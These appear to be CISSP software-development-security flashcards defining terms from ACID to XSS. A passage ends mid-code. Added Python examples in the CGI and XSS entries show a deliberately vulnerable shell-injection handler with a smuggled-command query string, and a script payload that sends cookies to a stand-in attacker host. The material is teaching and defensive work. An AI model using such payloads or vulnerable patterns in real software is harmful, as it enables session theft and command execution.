Domain 8: Software Development Security Flashcards

Learn vocabulary related to secure coding, development practices, and software vulnerabilities.

1
Q

Define:

ACID Transaction

A

A database transaction type characterized by Atomicity, Consistency, Isolation, and Durability, key for maintaining data integrity.

A concept used in database management to ensure that all database transactions are processed reliably. ACID stands for Atomicity (transactions are all-or-nothing), Consistency (transactions must leave the database in a consistent state), Isolation (transactions are processed independently), and Durability (once a transaction is committed, it is permanently recorded). This framework is crucial for maintaining data integrity across a variety of applications.

For more information, view this lecture on Databases - part 4. Or visit this Wikipedia page.

2
Q

Define:

Adversarial Machine Learning

A

Adversarial Machine Learning studies techniques used by attackers to trick or manipulate machine learning models, highlighting vulnerabilities and guiding defenses against deceptive or disruptive inputs.

In adversarial machine learning, attackers craft inputs designed to exploit model flaws, forcing misclassifications or unintended outcomes. Attack vectors can include poisoning training data, introducing malicious data in real-time, or reverse-engineering model details to generate harmful examples. Defenses involve robust training methods, model interpretability, and continuous monitoring of systems. By studying such strategies, security teams can identify weaknesses and implement effective countermeasures. This field is crucial for protecting AI-driven applications across industries, from healthcare and finance to autonomous systems.

Or visit this Wikipedia page.

3
Q

Define:

Agile

A

A flexible and iterative development methodology that values adaptability, customer satisfaction, and rapid, continuous delivery, often incorporating security best practices.

A methodology often used in software development that emphasizes flexibility, collaboration, customer satisfaction, and rapid delivery. Rather than planning the entire project in detail from the start, Agile encourages adaptive planning, evolutionary development, early delivery, and continuous improvement. This approach can significantly benefit security practices by integrating security considerations into the development process from the beginning and enabling rapid response to changing threats.

For more information, view this lecture on Software development methodologies part 1. Or visit this Wikipedia page.

4
Q

Define:

API Conflicts

A

Issues arising from an API’s unexpected behavior due to overlapping functions, inconsistencies, or version incompatibilities, addressed by careful design and testing.

Situations that occur when an API does not operate as expected, potentially due to overlapping functionalities, inconsistencies among different API calls, or version mismatches. Resolving API conflicts often requires careful design, testing, and version control to prevent and address these issues.

5
Q

Define:

API Endpoints

A

The specific interaction points between an API and the software that uses it, typically defined by URLs in web APIs for different functions and data operations.

The specific points of interaction or communication between an API and the software components that use it. In the context of a web API, an endpoint typically refers to a specific URL where an API can receive and send data. Each endpoint corresponds to a specific function or data resource, and it can accept certain types of requests (e.g., GET, POST, PUT, DELETE in the case of a RESTful API) to perform operations like retrieving, adding, modifying, or deleting data.

For more information, view this lecture on Software development methodologies part 4.

6
Q

Define:

Applet

A

A small program embedded in a web page for interactive experiences, traditionally Java-based but now less common due to security concerns and browser plugin support decline.

A small, client-side program that is typically embedded within a web page to provide interactive features that execute in the context of a user’s browser. Historically, Java applets were common, but due to various security concerns and the phasing out of plugin support by modern web browsers, the use of Java applets has declined significantly. Current web applications now favor using HTML5, JavaScript, or WebAssembly to create dynamic and interactive user experiences directly in the browser without the need for additional plugins.

For more information, view this lecture on Web architecture and attacks. Or visit this Wikipedia page.

7
Q

Define:

Application

A

A program designed to help users perform specific tasks, varying in scope from large systems like enterprise resource planning software to individual productivity tools.

In the context of computing, an application refers to a software program that enables users to perform specific tasks or activities. Applications can range from large systems such as enterprise resource planning (ERP) software to smaller tools such as word processors or games. They are designed to interact with users and can manipulate data to produce desired outcomes based on the user’s input and the application’s own logic.

For more information, view this lecture on Designing security into our software. Or visit this Wikipedia page.

8
Q

Define:

Application Acquisition Review

A

An evaluation of a software application’s security and suitability prior to acquisition, assessing factors like compliance, vulnerabilities, and vendor reliability.

A process or a stage in the software procurement process where the suitability and security aspects of a software application are evaluated before its acquisition. The review can include checks for the software’s compliance with security standards, its compatibility with existing systems, potential vulnerabilities, and the reputation and reliability of the software vendor. The goal is to ensure the software meets the organization’s requirements and does not introduce unacceptable risks.

For more information, view this lecture on Buying software from other companies.

9
Q

Define:

Application Architecture

A

The structural design of a software application, defining the interaction of components to meet business requirements and ensure functionality, security, and manageability.

The high-level structure of a software application, encompassing the way its components interact and how they serve the user’s needs. It involves designing the components and their relationships based on business requirements and constraints to ensure the application’s functionality, performance, security, and manageability.

Or visit this Wikipedia page.

10
Q

Define:

Application Benchmarking

A

Testing an application’s performance to identify any issues and establish a standard for future evaluations, ensuring reliability and efficiency under various conditions.

The practice of testing an application under specific conditions to assess its performance characteristics, such as responsiveness, throughput, and resource usage. It allows the identification of bottlenecks or vulnerabilities in the system and provides a standard of performance against which future changes can be evaluated. This process aids in ensuring the reliability, efficiency, and robustness of the application under various scenarios.

11
Q

Define:

Application Development Review

A

Assessing an application during development to ensure it meets requirements and standards, focusing on aspects like design, coding, testing, and security.

The process of assessing an application during its development stage to ensure it meets specified requirements and standards. The review can cover various aspects, including design, coding, testing, and security practices. The aim is to detect and rectify any issues or vulnerabilities early in the development lifecycle, enhancing the quality and security of the final product.

12
Q

Define:

Application Hardening

A

The process of securing an application by reducing its attack surface and minimizing potential vulnerabilities through techniques such as removing unused features and regularly updating software.

This is the process of securing an application by reducing its attack surface and minimizing potential vulnerabilities. Techniques include removing unused features, disabling unnecessary services, configuring robust security settings, and regularly updating the software to patch any known security issues. By hardening an application, organizations can better protect their systems and data from unauthorized access or exploitation.

For more information, view this lecture on Asset tracking and hardware hardening. Or visit this Wikipedia page.

13
Q

Define:

Application Implementation Review

A

An assessment to ensure that a newly deployed application meets intended objectives and complies with organizational policies and security standards, examining its configuration and performance.

An assessment conducted to ensure that a newly deployed application meets its intended objectives and adheres to organizational policies and security standards. The review may involve examining the application’s configuration, integration with other systems, and overall performance. This evaluation helps identify any issues or vulnerabilities that may have been introduced during deployment so they can be addressed promptly.

14
Q

Define:

Application Programming Interface

(API)

A

A set of protocols and tools for building software applications that specify how different software components should interact, serving as a bridge for program communication.

A set of protocols and tools for building software and applications. An API specifies how software components should interact, serving as an intermediary that allows different programs to communicate with each other. An API is often thought of as a translator that sits between applications that do not speak the same language.

For more information, view this lecture on Secure system design concepts. Or visit this Wikipedia page.

15
Q

Define:

Application Security

A

Practices aimed at protecting applications from threats by ensuring the confidentiality, integrity, and availability of the data they process and store, using measures like access control and encryption.

The practice of protecting applications from threats and vulnerabilities in order to ensure the confidentiality, integrity, and availability of the information they process and store. It is a crucial aspect of cyber security and involves various measures such as access control, encryption, and vulnerability management. Examples of application security measures include firewalls, intrusion detection systems, and password policies.

For more information, view this lecture on Secure design principles. Or view this lecture on Web architecture and attacks. Or visit this Wikipedia page.

16
Q

Define:

Application Software Tracing and Mapping

A

The process of examining an application’s structure and behavior to detect vulnerabilities, inefficiencies, or bottlenecks, crucial for maintaining application performance and security.

A process of analyzing and visualizing the behavior and structure of software applications. It helps in understanding the flow and interdependencies within an application, aiding in the detection of vulnerabilities, bottlenecks, or inefficiencies. Given the complexity of modern applications, tracing and mapping can be essential tools for maintaining application performance and security.

For more information, view this lecture on SCA - Software Composition Analysis.

17
Q

Define:

Application System

A

A set of cooperating applications that collectively provide a specific function or service, often involving user interfaces, databases, and processes where maintaining security is vital.

This consists of a group of applications working together to deliver a certain function or service, often involving multiple user interfaces, databases, and processes. These systems can be complex and interconnected, making their security crucial. Ensuring the integrity, confidentiality, and availability of data in these systems is a fundamental part of maintaining secure operations.

18
Q

Define:

Application-Level Encryption

A

Encrypting data at the application level, rather than at the network or transport level, to protect sensitive information and ensure confidentiality, integrity, and availability.

The process of encrypting data at the application level rather than at the network or transport level. It is used to protect sensitive information and ensure confidentiality, integrity, and availability. Examples include encrypting a password before storing it in a database, encrypting a file before sending it over the Internet, or encrypting credit card information before processing a transaction.

19
Q

Define:

Approved APIs

A

Application Programming Interfaces that have been vetted and sanctioned for use within an environment, meeting security, reliability, and performance standards.

These are Application Programming Interfaces that have been vetted and approved for use within a certain environment. They are recognized as meeting certain criteria for security, reliability, and performance. Using approved APIs is important to maintain the security of applications and systems, as unauthorized or malicious APIs can introduce vulnerabilities or cause data breaches.

For more information, view this lecture on Secure system design concepts.

20
Q

Define:

Assembly Language

A

A low-level programming language that closely represents a computer’s machine code, allowing for direct control of hardware in a more readable format for humans.

A low-level programming language for a computer or other programmable device in which there is a very strong correspondence between the language and the architecture’s machine code instructions. Each assembly language is specific to a particular computer architecture, in contrast to high-level programming languages, which are generally portable across multiple systems. Assembly language is used in reverse engineering and malware analysis, as it provides more direct control of system processes.

For more information, view this lecture on Programming Concepts - Part 1. Or view this lecture on Network and Software forensics. Or visit this Wikipedia page.

21
Q

Define:

Backdoor

A

A method of bypassing normal security mechanisms to gain unauthorized system access, potentially inserted intentionally for maintenance or exploited by attackers.

A method, often covert, that bypasses normal authentication or encryption in a system, allowing unauthorized access or control. Although typically associated with malicious intent, backdoors are sometimes inserted intentionally for maintenance or troubleshooting; either way, adversaries can exploit them to gain unpermitted access, which can lead to information theft, system damage, or other adverse impacts.

For more information, view this lecture on Software vulnerabilities and Attacks. Or view this lecture on Penetration testing. Or visit this Wikipedia page.

22
Q

Define:

Blockchain

A

A distributed ledger technology securing records with cryptography, facilitating secure and transparent data storage and verification in decentralized systems like digital currencies.

A distributed database that maintains a continuously growing list of records (blocks) secured by cryptography. It is used in digital currencies and distributed systems to provide a secure and transparent way of storing and verifying data. For example, a blockchain network can be used to record and verify transactions in a decentralized manner without the need for a central authority.

For more information, view this lecture on Virtualization, Cloud, and Distributed Computing - Part 5. Or visit this Wikipedia page.

23
Q

Define:

Buffer

A

A temporary storage area for data in transit, used to manage differences in processing rates, critical for computing and networking but a potential vulnerability if not managed correctly.

A temporary storage area for data while it is being transferred from one place to another. Typically, this is used when there is a difference between the rate at which data is received and the rate at which it can be processed or forwarded. Buffers are crucial components in many aspects of computing and networking. However, when not properly managed, buffers can become a point of vulnerability, leading to potential exploits such as buffer overflow attacks.

For more information, view this lecture on Software vulnerabilities and Attacks. Or visit this Wikipedia page.

24
Q

Define:

Buffer Overflow Attack

A

An exploit that uses buffer overflow vulnerabilities to inject and execute malicious code, leading to system crashes or unauthorized control, highlighting the need for secure coding.

A form of security exploit that takes advantage of buffer overflow vulnerabilities in a system. By sending more data to a buffer than it can handle, an attacker can overwrite adjacent memory locations and potentially inject and execute malicious code. This can lead to a variety of harmful outcomes, from crashing the system to gaining unauthorized access or control. These attacks underscore the importance of proper memory management and secure coding practices in systems and applications.

For more information, view this lecture on Software vulnerabilities and Attacks. Or visit this Wikipedia page.

25
# Define: Capability Maturity Model Integration | (CMMI)
A model helping organizations streamline process improvement and encourage efficient behaviors that decrease risks in development and service delivery.

## Footnote

An enhancement of the original Capability Maturity Model (CMM), CMMI is a process and behavioral model that helps organizations streamline process improvement and encourage productive, efficient behaviors that decrease risks in software, product, and service development. The model provides a set of best practices that guide businesses through a continuum of improvements from an initial, ad hoc state of processes to a mature, disciplined state.

*For more information, view this lecture on [Maturity Models - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182137-maturity-models-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Capability_Maturity_Model_Integration).*
26
# Define: Cascading Style Sheets | (CSS)
A stylesheet language for describing the presentation of web pages, including defining fonts, colors, and layouts.

## Footnote

A stylesheet language used for describing the presentation of a document written in a markup language. CSS is commonly used in web development to control the appearance and layout of web pages. Examples of using CSS include defining the font, color, and size of text on a webpage or setting the position and size of images and other elements on the page.

*For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/CSS).*
27
# Define: CI/CD Environments
Continuous Integration and Continuous Delivery/Deployment environments that integrate and deploy code changes rapidly and regularly.

## Footnote

CI/CD stands for Continuous Integration and Continuous Delivery/Deployment. Continuous Integration involves integrating changes from different contributors into a central repository frequently, which encourages catching integration bugs early. Continuous Delivery/Deployment involves automating the release process to get validated changes deployed to production quickly and sustainably. From a security perspective, CI/CD environments should be set up to include automated security checks and tests at various stages, such as static code analysis for potential vulnerabilities and dynamic testing in staging environments, to ensure that security is a part of the process from start to finish.

*For more information, view this lecture on [DevOps and DevSecOps](https://courses.thorteaches.com/courses/take/cissp/lessons/29669508-devops-and-devsecops). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/CI/CD).*
28
# Define: Class Loader
A component in programming languages like Java that loads class files for the program, crucial for secure class loading.

## Footnote

In the context of programming languages like Java, a class loader is part of the runtime environment, responsible for finding and loading class files as required by the program. It plays a crucial role in Java's security model, as it's responsible for loading (or linking) classes in a secure manner from local file systems, network locations, or other sources. The class loader's security measures are critical in preventing unauthorized access to sensitive resources.

*For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Java_Classloader).*
29
# Define: CLASSPATH
An environment variable in Java that determines where the Java Virtual Machine (JVM) looks for class libraries during execution.

## Footnote

An environment variable in Java programming that tells the Java Virtual Machine (JVM) and Java technology-based applications where to find class libraries, including user-defined class libraries. This is crucial for the execution of Java applications, as CLASSPATH can be set to point to the directories where related class files are stored.

*For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Classpath_(Java)).*
30
# Define: Cleanroom Methodology
A software development process focused on defect prevention through statistical quality control and process management.

## Footnote

A rigorous software development process aimed at producing defect-free software by applying engineering principles of process control and quality assurance. It emphasizes formal specification, incremental development, and statistical quality control, often involving automated tools to track defects and users' behavior to refine the software iteratively without introducing errors.

*For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Cleanroom_software_engineering).*
31
# Define: Client-Side Validation
The process of verifying data on the client's device before it is sent to a server, providing immediate feedback but not replacing server-side validation.

## Footnote

The verification of data on the client side of a client-server interaction, usually before the data is sent to the server. This can include ensuring form fields are filled out correctly, input matches expected formats, and other checks. While enhancing user experience by providing immediate feedback, it must not be the sole method of validation due to the potential for bypassing by malicious users; server-side validation provides an additional necessary layer of security.
32
# Define: CODASYL | (Conference on Data Systems Languages)
A consortium that contributed to database management systems and the COBOL language, establishing the network database model.

## Footnote

An influential consortium established in the late 1950s that played a pioneering role in the development of database management systems and the COBOL programming language. CODASYL's work led to the creation of the network database model, a precursor to the relational model, which was widely used in business applications.

*For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/CODASYL).*
33
# Define: Code Analysis Tools
Software that scans application code to identify vulnerabilities, errors, and adherence to coding standards, aiding in software quality improvement.

## Footnote

Software utilities that scan application code to identify potential security vulnerabilities, programming errors, and adherence to coding standards and best practices. These tools are critical in improving the quality of software by detecting flaws early in the development lifecycle, reducing the risk of vulnerabilities being exploited, and minimizing the cost of remediation.

*For more information, view this lecture on [SCA - Software Composition Analysis](https://courses.thorteaches.com/courses/take/cissp/lessons/54399265-new-2024-sca-software-composition-analysis). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Static_program_analysis).*
34
# Define: Code Escrow
A legal arrangement where source code is held by an escrow agent, released to the licensee if the licensor fails to meet contractual obligations.

## Footnote

A legal agreement involving at least three parties - a software licensing organization, the licensing customer, and an escrow agent. In this arrangement, the software's source code is given to an independent third party (the escrow agent) for safekeeping. The escrow agent releases the source code to the licensee in the event that the licensor fails to meet contractual obligations, such as maintenance, support, or bankruptcy, ensuring business continuity and access to critical functionalities.

*For more information, view this lecture on [Software development methodologies part 4.](https://courses.thorteaches.com/courses/take/cissp/lessons/36620216-software-development-methodologies-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Source_code_escrow).*
35
# Define: Code Repository
A central location for storing, managing, and versioning software code, facilitating collaboration among developers and maintaining a historical record of changes.

## Footnote

A centralized place where developers store, manage, track, and control different versions of software code. It enables collaboration, allowing multiple contributors to work on a project without overwriting each other's changes. This tool is vital for maintaining version control and enabling rapid recovery if necessary. Repositories can be hosted on a local server or on a cloud-based platform, with popular services including GitHub and Bitbucket.

*For more information, view this lecture on [Software development methodologies part 4.](https://courses.thorteaches.com/courses/take/cissp/lessons/36620216-software-development-methodologies-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Repository_(version_control)).*
36
# Define: Code Review
A thorough examination of source code by someone other than the author, aimed at identifying errors, security issues, and deviations from development guidelines.

## Footnote

The systematic examination of source code, usually carried out by someone other than the author, with the goal of identifying bugs, security breaches, or violations of development guidelines. This process not only enhances the overall quality of the software but also promotes knowledge sharing among the team, leading to better understanding and collaboration.

*For more information, view this lecture on [Software testing - Part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19180056-software-testing-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Code_review).*
37
# Define: Coding Guidelines and Standards
Conventions that guide the writing of source code in a programming language to ensure readability, maintainability, and quality of the software product.

## Footnote

A set of conventions or rules established for a specific programming language or development environment. These rules dictate the use of naming conventions, commenting, indentation, error handling, and more, with the intent of improving code readability, maintainability, and robustness. Adhering to such guidelines and standards is essential for facilitating team collaboration and ensuring the consistent quality of the software product.

*For more information, view this lecture on [SAFe - Scaled Agile Frameworks](https://courses.thorteaches.com/courses/take/cissp/lessons/54399261-new-2024-safe-scaled-agile-frameworks). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Programming_style).*
38
# Define: Coding Practices
The techniques and procedures that developers follow when writing code, focused on improving software quality and development efficiency.

## Footnote

The methods and procedures that programmers follow when writing their code. Good coding practices aim to improve the quality of software and the efficiency of the development process. They may include techniques such as code reuse, modularization, commenting, consistent indentation, error handling, and adhering to naming conventions. These practices help ensure that the code is clean, readable, efficient, and easy to maintain and debug.

*For more information, view this lecture on [SAFe - Scaled Agile Frameworks](https://courses.thorteaches.com/courses/take/cissp/lessons/54399261-new-2024-safe-scaled-agile-frameworks). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Programming_style).*
39
# Define: Cohesion
The extent to which elements within a module are related and contribute to a single task or function, with higher cohesion being preferable for security and maintainability.

## Footnote

In software design, cohesion refers to the degree to which the elements inside a module belong together. In essence, it's the measure of how closely related the responsibilities of a module are. High cohesion in software modules is desirable as it promotes the maintainability and reliability of the software. This concept is important in the context of secure software design, as low cohesion can lead to software vulnerabilities due to poorly defined module boundaries.

*For more information, view this lecture on [Databases - part 4.](https://courses.thorteaches.com/courses/take/cissp/lessons/36620229-databases-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Cohesion_(computer_science)).*
40
# Define: Commercial Off-The-Shelf Software | (COTS)
Readily available, pre-packaged software used by organizations to reduce development costs and time.

## Footnote

A pre-packaged software that is readily available for purchase and use by organizations. It is used in businesses and government agencies to reduce the cost and time of software development. Examples include Microsoft Office and Adobe Photoshop.

*For more information, view this lecture on [Buying software from other companies.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182140-buying-software-from-other-companies). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Commercial_off-the-shelf).*
41
# Define: Common Gateway Interface | (CGI)
A protocol that allows web servers to execute external programs to generate dynamic web content, which can introduce security risks. ## Footnote A standard that enables a web server to execute an external program, often a script, to generate dynamic web content. The server typically launches a new process per request and hands it the request data through environment variables such as QUERY_STRING and through standard input, so CGI acts as the interface between the web server and the program that produces the page. While CGI programs can provide powerful functionality, they run with the web server's privileges and were historically shell or Perl scripts, so passing unsanitized request parameters to a shell or filesystem call was a classic source of command injection and path traversal. CGI programs must validate their input and be isolated from sensitive system operations. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Common_Gateway_Interface).*
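The classic CGI failure mode described above, shown as an added Python example (not code from the flashcard page or the linked course): a query parameter spliced into a shell command line beside the fixed handler. The "lookup" command is a stand-in (`echo`), the query strings are constructed, and a POSIX shell is assumed.

```python
"""Command injection through a CGI query parameter, beside the fixed handler.
Added example, not from the flashcard page; 'echo' stands in for the real
lookup command and the query strings are constructed. Needs a POSIX shell."""
import subprocess
from urllib.parse import parse_qs


def _param(query_string: str, name: str) -> str:
    # CGI hands the raw query string to the program in QUERY_STRING;
    # parse_qs performs the URL decoding the attacker relies on.
    return parse_qs(query_string).get(name, [""])[0]


def lookup_vulnerable(query_string: str) -> str:
    """Classic CGI bug: the parameter is spliced into a shell command line,
    so metacharacters such as ';', '|' or '$( )' become extra commands."""
    user = _param(query_string, "user")
    cmd = f"echo lookup {user}"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


def lookup_safe(query_string: str) -> str:
    """Allow-list the parameter, then pass it as a single argv element with
    no shell involved, so its content is never reinterpreted."""
    user = _param(query_string, "user")
    if not (user.isascii() and user.isalnum() and len(user) <= 32):
        return "invalid user\n"
    out = subprocess.run(["echo", "lookup", user],
                         capture_output=True, text=True, check=True)
    return out.stdout


# Constructed request: user=bob; echo PWNED  (URL-encoded as it arrives)
ATTACK_QUERY = "user=bob%3B%20echo%20PWNED"

if __name__ == "__main__":
    print(lookup_vulnerable(ATTACK_QUERY), end="")  # second line is the injected command
    print(lookup_safe(ATTACK_QUERY), end="")
    print(lookup_safe("user=bob"), end="")
```

The injected `echo PWNED` is harmless here; in a real deployment the same position in the command line would run whatever the attacker chose, with the web server's privileges. The fix has two independent parts: the allow-list rejects unexpected characters, and the argv form means that even a value that slips past validation is never parsed by a shell.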
42
# Define: Compiler
A computer program that translates high-level programming language code into machine code, essential for creating executable software applications. ## Footnote A computer program that translates source code written in a high-level programming language into machine code that can be executed by a computer. It is commonly used in software development to create efficient and optimized programs. Examples include GCC and Microsoft Visual C++. *For more information, view this lecture on [Programming Concepts - Part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Compiler).*
43
# Define: Component
A distinct part or element of a system that performs a specific function, whether hardware or software, designed for interchangeability and scalability. ## Footnote In the context of system architecture, a component is an individual part that performs a specific function within the larger system. It can refer to hardware elements (like a CPU or a hard drive), software elements (like a module or function), or sub-systems. Components typically interact with other elements within the system and are designed to be interchangeable or replaceable, promoting flexibility and scalability. *For more information, view this lecture on [Secure system design concepts.](https://courses.thorteaches.com/courses/take/cissp/lessons/18591293-secure-system-design-concepts). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_component).*
44
# Define: Computer-Aided Software Engineering | (CASE)
The use of tools to automate software development processes, enhancing software creation, testing, and maintenance. ## Footnote The use of computer-based tools to support the development, testing, and maintenance of software. It is used to automate and streamline the software development process and to improve the quality and reliability of software. Examples of CASE tools include modeling tools, code generation tools, and testing tools. *For more information, view this lecture on [Software Development Methodologies Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182089-software-development-methodologies-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Computer-aided_software_engineering).*
45
# Define: Constraint-Based/Logic Programming
A programming approach using logical rules and constraints to represent and solve problems, often employed in AI and expert systems. ## Footnote A programming paradigm that uses logical rules and constraints to represent and solve problems. It is often used for tasks such as optimization, scheduling, and planning, as well as for artificial intelligence and expert systems. Prolog and Mercury are examples of logic programming languages; constraint solving is usually layered on top of them (for example, Prolog's CLP(FD) libraries) or provided by dedicated constraint solvers and modeling languages such as MiniZinc. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Constraint_programming).*
46
# Define: Continuous Delivery/Deployment | (CD)
A software development practice automating the build, test, and release preparation of every code change, aiming for rapid and reliable software delivery. ## Footnote A software development practice where changes to code, such as new features, bug fixes, and configuration changes, are built, tested, and prepared for release in an automated and repeatable manner. The two terms are related but distinct: continuous delivery keeps every change in a deployable state and leaves the actual production release as a deliberate, often manual, decision, while continuous deployment goes one step further and automatically pushes every change that passes the pipeline into production. Either way, the goal is to make releases painless, low-risk events that can be performed at any time, on demand. Because the pipeline can deploy to production, its credentials, build agents, and artifact stores are high-value targets and need the same access controls as the production environment itself. *For more information, view this lecture on [DevOps and DevSecOps](https://courses.thorteaches.com/courses/take/cissp/lessons/29669508-devops-and-devsecops). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/CI/CD).*
47
# Define: Continuous Integration | (CI)
A development practice where code changes are frequently integrated and tested, aiming for early detection of issues and improved software quality. ## Footnote A software development practice where developers regularly merge their changes into a central repository, after which automated builds and tests are run. The main goals of CI are to find and address bugs quicker, improve software quality, and reduce the time it takes to validate and release new software updates. *For more information, view this lecture on [DevOps and DevSecOps](https://courses.thorteaches.com/courses/take/cissp/lessons/29669508-devops-and-devsecops). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/CI/CD).*
48
# Define: Continuous Integration/Continuous Delivery | (CI/CD)
Practices automating code integration into repositories and application deployment, streamlining development. ## Footnote Software development practices that automate the integration of code changes into a repository and the delivery or deployment of applications to production environments. CI/CD streamlines the development process, reduces the time to release, and enhances the reliability of software releases. *For more information, view this lecture on [DevOps and DevSecOps](https://courses.thorteaches.com/courses/take/cissp/lessons/29669508-devops-and-devsecops). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/CI/CD).*
49
# Define: Coupling
The degree of interdependence between system modules, with low coupling being preferable for modularity. ## Footnote In the context of software design, coupling refers to the degree to which one module or component depends on another. High coupling indicates that a change in one module may require changes in other modules, while low coupling allows for a more modular and independent design. *For more information, view this lecture on [Databases - Part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/36620229-databases-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Coupling_(computer_programming)).*
50
# Define: Cross-Site Request Forgery | (XSRF)
An attack that causes a victim's browser to send an unintended, authenticated request to a web application where the user is logged in. ## Footnote A cyber-attack that tricks a web browser into executing an unwanted action in a web application to which a user is logged in. It exploits the trust that a site has for the user's browser: because the browser automatically attaches session cookies to every request, a forged request (for example, a form auto-submitted from an attacker's page) arrives looking legitimate and can change user settings, post content without consent, or initiate transactions. Defenses include anti-forgery (synchronizer) tokens that the attacker's page cannot read, the SameSite cookie attribute, and checking the Origin or Referer header. The browser's same-origin policy alone does not prevent CSRF; it stops the attacker's page from reading the response, not from sending the request. *For more information, view this lecture on [OWASP 2021 - Part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/29670704-owasp-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Cross-site_request_forgery).*
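The synchronizer-token defense, as an added Python example that is not code from the flashcard page or the linked course. The session store, the request dicts and the site origin `https://bank.example` are assumptions standing in for a real web framework.

```python
"""Synchronizer-token CSRF check with an Origin/Referer fallback.
Added example, not from the flashcard page. The session and request are
plain dicts and ALLOWED_ORIGIN is an assumed site origin."""
import hmac
import secrets
from urllib.parse import urlsplit

ALLOWED_ORIGIN = "https://bank.example"  # assumption: the application's own origin


def issue_csrf_token(session: dict) -> str:
    """Generate a per-session anti-forgery token and keep it server side.
    The token is embedded in the site's own forms, which an attacker's page
    cannot read because of the same-origin policy."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def _origin_ok(headers: dict) -> bool:
    """Check Origin, falling back to Referer, against the site's own origin."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False  # browsers send Origin on cross-site POSTs; neither header is suspicious
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == ALLOWED_ORIGIN


def is_authorized_state_change(session: dict, request: dict) -> bool:
    """A state-changing request must carry the session's token in the body and
    originate from our own site. The session cookie alone, which the browser
    attaches automatically, is exactly what CSRF abuses, so it never suffices."""
    expected = session.get("csrf_token")
    submitted = request.get("form", {}).get("csrf_token", "")
    if not expected or not submitted:
        return False
    # Constant-time compare on bytes so a non-ASCII guess cannot raise TypeError.
    if not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False
    return _origin_ok(request.get("headers", {}))


def demo() -> tuple[bool, bool, bool]:
    """Legitimate form post, a cross-site forgery, and a guessed token."""
    session = {"user": "alice"}
    token = issue_csrf_token(session)
    legit = {"headers": {"Origin": ALLOWED_ORIGIN},
             "form": {"csrf_token": token, "to": "bob", "amount": "10"}}
    forged = {"headers": {"Origin": "https://evil.example"},
              "form": {"to": "mallory", "amount": "10000"}}   # cookie present, token absent
    guessed = {"headers": {"Origin": ALLOWED_ORIGIN},
               "form": {"csrf_token": "x" * 43}}
    return (is_authorized_state_change(session, legit),
            is_authorized_state_change(session, forged),
            is_authorized_state_change(session, guessed))


if __name__ == "__main__":
    print(demo())
```

Setting `SameSite=Lax` or `Strict` on the session cookie is a complementary control: it stops the browser from attaching the cookie to most cross-site requests in the first place, but the token check remains necessary for older clients and for the cases (top-level GET navigations under Lax) that SameSite does not cover.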
51
# Define: Cross-Site Scripting | (XSS)
A vulnerability allowing attackers to inject malicious scripts into webpages viewed by other users. ## Footnote A type of security vulnerability that targets web applications, XSS enables attackers to inject malicious scripts into webpages viewed by other users. By exploiting the trust a user has for a particular site, these scripts run with the page's origin and can access any cookies, session tokens, or other sensitive information retained by the user's browser for that site, and can perform actions as the user. The main variants are reflected (the payload is echoed back from the request), stored (the payload is saved server side and served to other users), and DOM-based (the payload is handled by client-side script). The primary defense is context-aware output encoding of untrusted data, supported by a Content Security Policy and the HttpOnly cookie flag. *For more information, view this lecture on [OWASP 2021 - Part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/29670704-owasp-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Cross-site_scripting).*
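A reflected XSS sink beside its output-encoded form, as an added Python example that is not code from the flashcard page or the linked course. The page fragments and the cookie-stealing payload are constructed for illustration.

```python
"""Reflected XSS: unencoded interpolation beside context-aware output encoding.
Added example, not from the flashcard page; templates and payload are constructed."""
from html import escape

# Constructed payload: exfiltrates document.cookie to an attacker host.
PAYLOAD = "<script>location='https://evil.example/?c='+document.cookie</script>"


def render_greeting_vulnerable(name: str) -> str:
    """Attacker-controlled text lands in the HTML body, so markup is interpreted."""
    return f"<h1>Hello, {name}!</h1>"


def render_greeting_safe(name: str) -> str:
    """Encode for the HTML text context: < > & " ' become entities and the
    browser renders the payload as literal text."""
    return f"<h1>Hello, {escape(name, quote=True)}!</h1>"


def render_link_safe(url: str, label: str) -> str:
    """Attribute context: entity-encoding stops breaking out of the quotes but
    does not neutralise a javascript: URL, so the scheme is allow-listed too."""
    if not url.lower().lstrip().startswith(("http://", "https://")):
        url = "#"
    return f'<a href="{escape(url, quote=True)}">{escape(label, quote=True)}</a>'


def contains_active_script(html: str) -> bool:
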